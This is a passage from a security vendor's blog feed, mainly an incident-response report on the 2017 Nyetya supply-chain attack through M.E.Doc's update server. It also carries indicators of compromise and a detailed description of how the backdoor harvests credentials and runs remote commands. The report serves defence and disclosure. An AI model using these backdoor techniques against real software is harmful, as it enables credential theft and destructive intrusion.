8aef427aba54581f9c3dc923d8464a92b2d4e83cdf0fd6ace00e8035ee2936ad&lt;/li&gt;&lt;/ul&gt;&lt;h4 id="h.3m2ba6uxcylz"&gt;Network&lt;/h4&gt;&lt;ul&gt;&lt;li&gt;Member-daumchk[.]netai[.]net&lt;/li&gt;&lt;/ul&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=GZVq9S5Btyo:qaPUAiNv-3k:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/GZVq9S5Btyo" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-06T10:19:13.522-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-82_5hKivejo/WV3W_IpsSJI/AAAAAAAAAJE/IX_3APJpsjMuk8GitdpUQE4Lc4Hk669WQCLcBGAs/s72-c/image3.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html</feedburner:origLink></item><item><title>The MeDoc Connection</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/xX_tCOnymFk/the-medoc-connection.html</link><category>APT</category><category>ransomware</category><category>wiper</category><author>noreply@blogger.com (Nick Biasini)</author><pubDate>Wed, 05 Jul 2017 11:22:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-6684040042737345889</guid><description>&lt;i&gt;This Post Authored by &lt;a href="https://twitter.com/dave_maynor"&gt;David Maynor&lt;/a&gt;, Aleksandar Nikolic, &lt;a href="https://twitter.com/kpyke"&gt;Matt Olney&lt;/a&gt;, and &lt;a href="http://fort-knox.org/"&gt;Yves Younan&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;&lt;h3&gt;Summary&lt;/h3&gt;&lt;div&gt;The Nyetya attack was a destructive ransomware variant that affected many organizations inside of Ukraine and multinational corporations with operations in Ukraine. In cooperation with Cisco Advanced Services Incident Response, Talos identified several key aspects of the attack. The investigation found a supply chain-focused attack at M.E.Doc software that delivered a destructive payload disguised as ransomware. By utilizing stolen credentials, the actor was able to manipulate the update server for M.E.Doc to proxy connections to an actor-controlled server. Based on the findings, Talos remains confident that the attack was destructive in nature. The effects were broad reaching, with Ukraine Cyber police confirming over 2000 affected companies in Ukraine alone.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3&gt;Details&lt;/h3&gt;For Talos, June 27th, 2017, started with a message from our intelligence partners in Ukraine. &amp;nbsp;A massive ransomware attack was underway, and they were asking for help. &amp;nbsp;An organized attacker had the means to deliver arbitrary code to users of the most popular accounting software in Ukraine, and that includes multinational corporations that do business there. &amp;nbsp;The actor in question chose to use this capability to encrypt critical files and hard drives, with no way to decrypt the software.&lt;br /&gt;&lt;br /&gt;Since the BlackEnergy attacks of late 2015, Talos has worked with public and private organizations in Ukraine to respond to attacks in the region. &amp;nbsp;Once already this year, Talos has assisted organizations targeted by actors with destructive intent. &amp;nbsp;Interestingly, in those cases a wiper very similar to prior BlackEnergy malware was deployed and, when that was blocked by our Advanced Malware Protection (AMP) product, the actor fell back to using a ransomware variant in an attempt to disrupt the organization’s activities. &amp;nbsp;With this recent history in mind, we were immediately concerned that there was more to this story than just another ransomware attack.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-WPWy4CVApVw/WV0Vn3dqn9I/AAAAAAAABQU/VMA6gRfjBdQwuy9i3YMEawNZYaffZuuhACK4BGAYYCw/s1600/Screenshot%2B2017-07-04%2B11.03.09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="207" src="https://1.bp.blogspot.com/-WPWy4CVApVw/WV0Vn3dqn9I/AAAAAAAABQU/VMA6gRfjBdQwuy9i3YMEawNZYaffZuuhACK4BGAYYCw/s400/Screenshot%2B2017-07-04%2B11.03.09.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Early on it became clear that, while a majority of the early events were in Ukraine, the malware was infecting organizations that didn’t immediately have any known connection to the country. &amp;nbsp;Because of the scale of the event, Talos initiated an internal response management system call TaCERS (Talos Critical Event Response System) and began the research and response process. &amp;nbsp;TaCERS divides up activities into intelligence, telemetry analysis, reverse engineering, communications and detection research. &amp;nbsp;Talos researchers and engineers from around the world came together to address this threat.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Based on endpoint telemetry, it was clear that a Ukranian accounting software package called “M.E.Doc” was at the center of activity. Like WannaCry, there were reports of an email vector. &amp;nbsp;This is most likely because some of the earliest infected machines had concurrent Lokibot infections with indications of an email vector for that malware. After careful research Talos concluded that for the delivery of the Nyetya malware, all installations came through the M.E.Doc update system.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;M.E.Doc is a widely deployed accounting package created by a Ukrainian company named Intellect Service and that it was used to interact with Ukrainian tax systems. &amp;nbsp;At this point we were in a position to reach out to M.E.Doc directly and offer assistance.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;M.E.Doc was quick to accept an offer of assistance. &amp;nbsp;As part of Cisco’s global response to this event, two incident response specialists from the Advanced Services group arrived in Ukraine on the evening of June 29th and an additional incident response specialist supported the investigation from the UK. &amp;nbsp;M.E.Doc was exceptionally open in arranging access to engineers and administrators who walked the team through the system and provided access to log files and code. &amp;nbsp;They also agreed to share the results of our investigation for the purposes of this report.&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;In every Cisco incident response investigation, anywhere in the world, a dedicated Talos resource is made available to the incident response team to coordinate intelligence analysis, reverse engineering escalations and telemetry analysis activities. &amp;nbsp;The two teams work together constantly, and that experience was put to full use in this investigation.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Early in the investigation, a web shell was discovered at http://www.me-doc[.]com[.]ua/TESTUpdate/medoc_online.php. &amp;nbsp;The timestamp in the file was May 31 14:45 2017. Our analysis shows the webshell to be a slightly modified version of the open source PHP webshell PAS. The webshell is stored in an encrypted form and requires a passphrase set in a HTTP POST variable to decrypt. The decryption of the shell shows a fully featured PAS webshell.&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-7-4vmF7l30k/WV0WioQoSPI/AAAAAAAABQc/yhEZCUY56hMp7uYXTA4POTb2dBNuahsnQCK4BGAYYCw/s1600/nyetya_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://2.bp.blogspot.com/-7-4vmF7l30k/WV0WioQoSPI/AAAAAAAABQc/yhEZCUY56hMp7uYXTA4POTb2dBNuahsnQCK4BGAYYCw/s400/nyetya_1.png" width="375" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;div&gt;As the incident response team extracted logs and additional forensic data, it was uploaded to Talos. &amp;nbsp;This started a 24-hour cycle where at around 10am EDT, when it was evening in Ukraine, the Cisco incident response team would brief Talos on their findings and new data. &amp;nbsp;Then at 3am EDT, as Ukraine was getting to work, Talos would brief the Cisco incident response team on their overnight findings.&lt;/div&gt;&lt;div&gt;Almost immediately, indications of problems were found. &amp;nbsp;In the July 1st briefing, Talos identified key evidence in the logs:&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;table border="1" style="width: 100%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;8:57:46 AM&lt;/td&gt;&lt;td&gt;usc-cert sshd[23183]: subsystem request for sftp &lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;8:59:09 AM&lt;/td&gt;&lt;td&gt;usc-cert su: BAD SU &lt;redacted&gt; to root on /dev/pts/0&lt;/redacted&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;8:59:14 AM&lt;/td&gt;&lt;td&gt;usc-cert su: &lt;redacted&gt; to root on /dev/pts/0&lt;/redacted&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="15%"&gt;9:09:20 AM&lt;/td&gt;&lt;td&gt;[emerg] 23319#0: unknown directive "&lt;feff&gt;" in /usr/local/etc/nginx/nginx.conf:3&lt;/feff&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;9:11:59 AM&lt;/td&gt;&lt;td&gt;[emerg] 23376#0: location "/" is outside location "\.(ver|txt|exe|upd|rtf|cmnt)$" in /usr/local/etc/nginx/nginx.conf:136&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;An unknown actor had stolen the credentials of an administrator at M.E.Doc. &amp;nbsp;They logged into the server, acquired root privileges and then began modifying the configuration file for the NGINX web server. &amp;nbsp;We were unable to recover the nginx.conf file, as it was subsequently overwritten, but additional log files were important in understanding what was changed. &amp;nbsp;What we found were thousands of errors that looked like this:&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;blockquote class="tr_bq"&gt;[error] 23401#0: *374685644 upstream timed out (60: Operation timed out) while connecting to upstream, client: &amp;lt;REDACTED&amp;gt;, server: upd.me-doc.com.ua, request: "GET /last.ver?rnd=1b2eb092215b49f5b1d691b5c38e3a74 HTTP/1.1", upstream: "http://176.31.182[.]167:80/last.ver?rnd=1b2eb092215b49f5b1d691b5c38e3a74", host: "upd.me-doc.com.ua"&lt;/blockquote&gt;&lt;/blockquote&gt;The NGINX server had been reconfigured so that any traffic to upd.me-doc.com.ua would be proxied through the update server and to a host in the OVH IP space with an IP of 176.31.182.167. &amp;nbsp;Subsequent investigation found that this server was operated by a reseller, thcservers.com, and that the server had been wiped the same day at 7:46 PM UTC.&lt;br /&gt;&lt;br /&gt;When we compare the time of the first and last upstream error messages on the server to our in-field endpoint telemetry, we find that they bracket the beginning and the end of the active infection phase of the event. &amp;nbsp;The initial log message was at 9:11:59 UTC and the last message was seen at 12:31:12 UTC. &amp;nbsp;In our telemetry we see no new organizations infected outside of this timeframe.&lt;br /&gt;&lt;br /&gt;We found one other piece of forensic evidence showing that the event concluded on or around 12:30 PM UTC. &amp;nbsp;The file timestamp for nginx.conf at the time we analyzed the servers was Jun 27th, 12:33 PM UTC. &amp;nbsp;The actor had returned the NGINX configuration to its original state at this time. &amp;nbsp;There is only one other indicator to share, which was a Latvian IP address that disconnected from the system at 2:11:07 PM UTC:&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;Received disconnect from 159.148.186.214: 11: FlowSshClientSession: disconnected on user's request&lt;/blockquote&gt;M.E.Doc confirms that neither the OVH server nor the Latvian IP address have any association with M.E.Doc.&lt;br /&gt;&lt;br /&gt;At this point we understood that the actor in question had access to much of the network and many of the systems of M.E.Doc through compromised credentials. &amp;nbsp;The questions remaining were: &amp;nbsp;What were they doing with control of the upgrade server? &amp;nbsp;How were they delivering the malicious software?&lt;br /&gt;&lt;br /&gt;While we didn’t know it at the time, we can now confirm &lt;a href="https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/"&gt;ESET’s research&lt;/a&gt; into the backdoor that had been inserted into the M.E.Doc software. &amp;nbsp;The .net code in ZvitPublishedObjects.dll had been modified on multiple occasions to allow for a malicious actor to gather data and download and execute arbitrary code:&lt;br /&gt;&lt;br /&gt;&lt;table border="1"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Date&lt;/td&gt;&lt;td&gt;M.E.Doc Update Version&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;4/14/2017&lt;/td&gt;&lt;td&gt;10.01.175-10.01.176&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;5/15/2017&lt;/td&gt;&lt;td&gt;10.01.180-10.01.181&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;6/22/2017&lt;/td&gt;&lt;td&gt;10.01.188-10.01.189&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;Looking further back in the logs provided by M.E.Doc, we could see the same “upstream” activity on June 22nd. &amp;nbsp;Unfortunately, we do not have logs available for May or April, but it is reasonable to assume similar behavior occurs back through those dates as well.&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-6k2E9WGPhIU/WV1GNRjeJPI/AAAAAAAABSs/9-7vo7If2ZUOx2ehtLjoZAcVJv9iGHGZwCK4BGAYYCw/s1600/Nyetya%2BBlog%2BPost%2B1%25282%2529.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://3.bp.blogspot.com/-6k2E9WGPhIU/WV1GNRjeJPI/AAAAAAAABSs/9-7vo7If2ZUOx2ehtLjoZAcVJv9iGHGZwCK4BGAYYCw/s1600/Nyetya%2BBlog%2BPost%2B1%25282%2529.jpg" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Timeline&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;h3&gt;&lt;/h3&gt;&lt;h3&gt;&lt;br /&gt;ZvitPublishedObjects.dll Backdoor Analysis&lt;/h3&gt;&lt;div&gt;&lt;div&gt;The backdoor was added to the ZvitPublishedObjects.Server.UpdaterUtils.IsNewUpdate function in ZvitPublishedObjects.dll:&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://4.bp.blogspot.com/-NGkaaYMom5M/WV0aZvbKUeI/AAAAAAAABQk/hwvdSAzeIKMtANeCDcvUXnSfRe8ghFRhgCK4BGAYYCw/s1600/IsNewUpdate2.PNG" imageanchor="1"&gt;&lt;img border="0" height="312" src="https://4.bp.blogspot.com/-NGkaaYMom5M/WV0aZvbKUeI/AAAAAAAABQk/hwvdSAzeIKMtANeCDcvUXnSfRe8ghFRhgCK4BGAYYCw/s640/IsNewUpdate2.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;/blockquote&gt;&lt;div&gt;Between lines 278 and 279 on the left, we can see on the right that code was added to retrieve every organization’s EDRPOU and name. Then it creates a new MeCom object and a thread for it which will contact http://upd.me-doc[.]com.ua/last.ver?rnd=&amp;lt;GUID&amp;gt; every 2 minutes. It will also send any replies to this URL.&lt;br /&gt;&lt;br /&gt;If a proxy has been configured, when the MeCom object is created at line 288 on the right, it proceeds to retrieve the proxy’s host, port, username and password:&lt;/div&gt;&lt;div&gt;&lt;a href="http://1.bp.blogspot.com/-v_D9WCb4Xgo/WV0amkynVwI/AAAAAAAABQs/CFuBb0bxAeQmGKeuhNVNrfH0f_N-ZiSSACK4BGAYYCw/s1600/MeComProxy.PNG" imageanchor="1"&gt;&lt;img border="0" height="308" src="https://1.bp.blogspot.com/-v_D9WCb4Xgo/WV0amkynVwI/AAAAAAAABQs/CFuBb0bxAeQmGKeuhNVNrfH0f_N-ZiSSACK4BGAYYCw/s640/MeComProxy.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;It then retrieves the SMTP host, username, password and email address for every organization in the application’s database:&lt;/div&gt;&lt;div&gt;&lt;a href="http://4.bp.blogspot.com/-C0AXgdyKOLU/WV0auiJampI/AAAAAAAABQ0/9JO5IYtr7WAHHRxaFyG8KB2tsiPwugxWgCK4BGAYYCw/s1600/MeComySMTP.PNG" imageanchor="1"&gt;&lt;img border="0" height="310" src="https://4.bp.blogspot.com/-C0AXgdyKOLU/WV0auiJampI/AAAAAAAABQ0/9JO5IYtr7WAHHRxaFyG8KB2tsiPwugxWgCK4BGAYYCw/s640/MeComySMTP.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;It also writes the previously collected proxy info to a registry key: HKCU\SOFTWARE\WC. It stores the proxy username and password in the “Cred” subkey and the full proxy information in “Prx”.&lt;br /&gt;&lt;br /&gt;At line 294 in IsNewUpdate is a call to meCom.CreateMeainThread. &amp;nbsp;The code creates a thread that performs the “MainAction”. This thread will continuously query the request URL (http://upd.me-doc[.]com.ua/last.ver?rnd=&amp;lt;GUID&amp;gt;) looking for commands and will then start a new thread per command to execute, waiting a maximum of 10 minutes for the thread to complete. It will then send back the result of the thread to the response url, which in this case is the same as the request URL: http://upd.me-doc[.]com.ua/last.ver?rnd=&amp;lt;GUID&amp;gt;.&lt;br /&gt;&lt;br /&gt;The GetCommandsAndPeriod function will retrieve the commands from the web request:&lt;/div&gt;&lt;div&gt;&lt;a href="http://1.bp.blogspot.com/-RD1sZLH5Y-0/WV0a6mnLCQI/AAAAAAAABQ8/17E0nvkh5OEFNx7s5g5dJHWMZP1vEaf4wCK4BGAYYCw/s1600/MeComGetCommands.PNG" imageanchor="1"&gt;&lt;img border="0" height="274" src="https://1.bp.blogspot.com/-RD1sZLH5Y-0/WV0a6mnLCQI/AAAAAAAABQ8/17E0nvkh5OEFNx7s5g5dJHWMZP1vEaf4wCK4BGAYYCw/s640/MeComGetCommands.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;When sending the request, it will pass along in cookies the EDRPOU and the username that the program is running as. From the response, it will read the first 8 bytes as the initialization vector for the encryption. The rest of the data is encrypted with the TripleDes using a 24-character key: \x00 to \x17 (i.e. characters 0 to 23). It will decrypt, decompress and deserialize the commands it has to execute. It will also retrieve information on how long it should wait until the next time it goes to ask for commands (this was originally set to 2 minutes when the object was created).&amp;nbsp;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://1.bp.blogspot.com/-IE03IctR7uE/WV0bK_TCcuI/AAAAAAAABRE/xoJxe9b-rks0-R09EImYtXjq3jF2aV08wCK4BGAYYCw/s1600/MeComSendAnswer.PNG" imageanchor="1"&gt;&lt;img border="0" height="492" src="https://1.bp.blogspot.com/-IE03IctR7uE/WV0bK_TCcuI/AAAAAAAABRE/xoJxe9b-rks0-R09EImYtXjq3jF2aV08wCK4BGAYYCw/s640/MeComSendAnswer.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;SendAnswer will send multiple web requests with a maximum of 2048 bytes each, with the result of the executed command stored in cookies. It will encrypt this data the same way as the received commands, using a random 8-byte IV and the 24-character key 0-23.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;These are the encryption and decryption functions:&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://3.bp.blogspot.com/-TeBJNva-obo/WV0bYd_iQeI/AAAAAAAABRM/tkhvmHCqkQsYJPJc_S8bMgTi7b3l7J-1ACK4BGAYYCw/s1600/ZvitCryptoIV.PNG" imageanchor="1"&gt;&lt;img border="0" height="340" src="https://3.bp.blogspot.com/-TeBJNva-obo/WV0bYd_iQeI/AAAAAAAABRM/tkhvmHCqkQsYJPJc_S8bMgTi7b3l7J-1ACK4BGAYYCw/s640/ZvitCryptoIV.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://3.bp.blogspot.com/-Ujh3Wp3EMRU/WV0bd_pMHMI/AAAAAAAABRU/XbtTPEp-WwYN_TQjA7FAAY0wgAxzvJmKwCK4BGAYYCw/s1600/ZvitEncrypt.PNG" imageanchor="1"&gt;&lt;img border="0" height="328" src="https://3.bp.blogspot.com/-Ujh3Wp3EMRU/WV0bd_pMHMI/AAAAAAAABRU/XbtTPEp-WwYN_TQjA7FAAY0wgAxzvJmKwCK4BGAYYCw/s640/ZvitEncrypt.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://3.bp.blogspot.com/-Yy5IsrJ3m6I/WV0bi-4symI/AAAAAAAABRc/jw9bCg5s2IYjfZ7qlZNzcPXame_9qWW6wCK4BGAYYCw/s1600/ZvitDecrypt.PNG" imageanchor="1"&gt;&lt;img border="0" height="336" src="https://3.bp.blogspot.com/-Yy5IsrJ3m6I/WV0bi-4symI/AAAAAAAABRc/jw9bCg5s2IYjfZ7qlZNzcPXame_9qWW6wCK4BGAYYCw/s640/ZvitDecrypt.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;Finally, the Worker object (see Line 372 of MainFunction) handles executing the commands. There are a total of 6 commands that Worker can execute.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://4.bp.blogspot.com/-MoPjcRgmfzg/WV0cSXpfLJI/AAAAAAAABRs/kcRHFl-xPXMhVq2ILFbmJxaAz2UUG3LBACK4BGAYYCw/s1600/WorkerAutoPayload1.PNG" imageanchor="1"&gt;&lt;img border="0" height="430" src="https://4.bp.blogspot.com/-MoPjcRgmfzg/WV0cSXpfLJI/AAAAAAAABRs/kcRHFl-xPXMhVq2ILFbmJxaAz2UUG3LBACK4BGAYYCw/s640/WorkerAutoPayload1.PNG" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;This appears to be the mechanism used for delivering the Nyetya malware. &amp;nbsp;The command line arguments perfectly match what was observed in endpoint telemetry when M.E.Doc machines executed the initial sample.&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-fSEchhHvCSY/WV1GW9aLJcI/AAAAAAAABS0/zKMKcY6SZKUZ0EEHe8htkIFMwOj-3aHfgCK4BGAYYCw/s1600/Nyetya%2BBlog%2BPost%2B2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="622" src="https://2.bp.blogspot.com/-fSEchhHvCSY/WV1GW9aLJcI/AAAAAAAABS0/zKMKcY6SZKUZ0EEHe8htkIFMwOj-3aHfgCK4BGAYYCw/s640/Nyetya%2BBlog%2BPost%2B2.jpg" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Detail of Commands&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;h3&gt;What Now?&lt;/h3&gt;&lt;div&gt;&lt;div&gt;First we need to put together everything we know. &amp;nbsp;In the past Talos has observed an actor specifically targeting Ukrainian institutions attempt to use the BlackEnergy wiper malware and, when that attempt was blocked, fall back to using a ransomware variant as an acceptable replacement for a wiper. &amp;nbsp;We’ve also already documented in &lt;a href="http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html"&gt;our previous blog&lt;/a&gt; that “Given the circumstances of this attack, Talos assesses with high confidence that the intent of the actor behind Nyetya was destructive in nature and not economically motivated.” &amp;nbsp;Finally, now that we can confirm that M.E.Doc was the installation vector, we can assess that the targets for this attack were Ukraine and those organizations that chose to conduct business with Ukraine.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Our Threat Intelligence and Interdiction team is concerned that the actor in question burned a significant capability in this attack. &amp;nbsp;They have now compromised both their backdoor in the M.E.Doc software and their ability to manipulate the server configuration in the update server.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;In short, the actor has given up the ability to deliver arbitrary code to the 80% of UA businesses that use M.E.Doc as their accounting software, along with any multinational corporations that leveraged the software. &amp;nbsp;This is a significant loss in operational capability, and the Threat Intelligence and Interdiction team assesses with moderate confidence that it is unlikely that they would have expended this capability without confidence that they now have or can easily obtain similar capability in target networks of highest priority to the threat actor.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Based on this, Talos is advising that any organization with ties to Ukraine treat software like M.E.Doc and systems in Ukraine with extra caution since they have been shown to be targeted by advanced threat actors. &amp;nbsp;This includes providing them a separate network architecture, increased monitoring and hunting activities in those at-risk systems and networks and allowing only the level of access absolutely necessary to conduct business. &amp;nbsp;Patching and upgrades should be prioritized on these systems and customers should move to transition these systems to Windows 10, following the &lt;a href="https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/"&gt;guidance from Microsoft&lt;/a&gt; on securing those systems. &amp;nbsp;Additional guidance for network security baselining is available &lt;a href="http://www.cisco.com/c/en/us/td/docs/solutions/Enterprise/Security/Baseline_Security/securebasebook.html"&gt;from Cisco as well&lt;/a&gt;. &amp;nbsp;Network IPS should be deployed on connections between international organizations and their Ukrainian branches and endpoint protection should be installed immediately on all Ukrainian systems.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Talos places this attack in the supply-chain category. &amp;nbsp;Rather than targeting organizations directly, an actor compromises trusted hardware and software vendors to deliver compromised assets to a high-priority environment. &amp;nbsp;We believe that these types of malicious capabilities are highly desired by sophisticated actors. &amp;nbsp;All vendors, regardless of size or geographic region, must be increasingly vigilant. &amp;nbsp;Find out more about how Cisco assures the &lt;a href="https://blogs.cisco.com/security/cybersecurity-the-holistic-trust-approach"&gt;integrity of their products here&lt;/a&gt;.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;For further coverage of the Nyetya incident, please refer to our &lt;a href="http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html"&gt;previous blog post&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;h3&gt;Indicators of Compromise&lt;/h3&gt;&lt;h4&gt;SHA256&lt;/h4&gt;&lt;h4&gt;M.E.Doc ZvitPublishedObjects.dll files with backdoor:&lt;/h4&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;f9d6fe8bd8aca6528dec7eaa9f1aafbecde15fd61668182f2ba8a7fc2b9a6740&lt;/li&gt;&lt;li&gt;d462966166450416d6addd3bfdf48590f8440dd80fc571a389023b7c860ca3ac&lt;/li&gt;&lt;li&gt;2fd2863d711a1f18eeee5c7c82f2349c5d4e00465de9789da837fcdca4d00277&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h4&gt;Nyetya Malware:&lt;/h4&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745&lt;/li&gt;&lt;li&gt;02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f&lt;/li&gt;&lt;li&gt;eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Malicious IP Addresses:&lt;/h4&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;176.31.182[.]167&lt;/li&gt;&lt;li&gt;159.148.186[.]214&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;AMP Coverage&lt;/h4&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;W32.Ransomware.Nyetya.Talos&lt;/li&gt;&lt;li&gt;W32.F9D6FE8BD8.Backdoor.Ransomware.Nyetya.Talos&lt;/li&gt;&lt;li&gt;W32.D462966166.Backdoor.Ransomware.Nyetya.Talos&lt;/li&gt;&lt;li&gt;W32.2FD2863D71.Backdoor.Ransomware.Nyetya.Talos&lt;/li&gt;&lt;li&gt;W32.02EF73BD24-95.SBX.TG&lt;/li&gt;&lt;li&gt;W32.GenericKD:Petya.20h1.1201&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=xX_tCOnymFk:fzf_0n7C0dY:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
